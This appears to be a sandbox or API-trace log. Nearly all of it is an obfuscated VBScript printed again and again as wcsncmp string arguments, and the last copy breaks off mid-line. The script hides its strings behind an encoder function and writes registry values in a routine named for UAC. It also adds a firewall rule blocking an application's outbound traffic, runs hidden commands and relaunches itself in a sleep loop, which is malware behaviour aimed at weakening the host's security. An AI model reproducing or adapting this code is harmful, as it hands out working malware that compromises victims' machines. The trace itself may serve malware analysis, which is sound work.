bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0226.346] wcsncmp (_String1=".Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 33 [0226.346] wcsncmp (_String1="Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 65 [0226.346] wcsncmp (_String1="ame, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84 [0226.347] wcsncmp (_String1="me, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 96 [0226.347] wcsncmp (_String1="e, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run 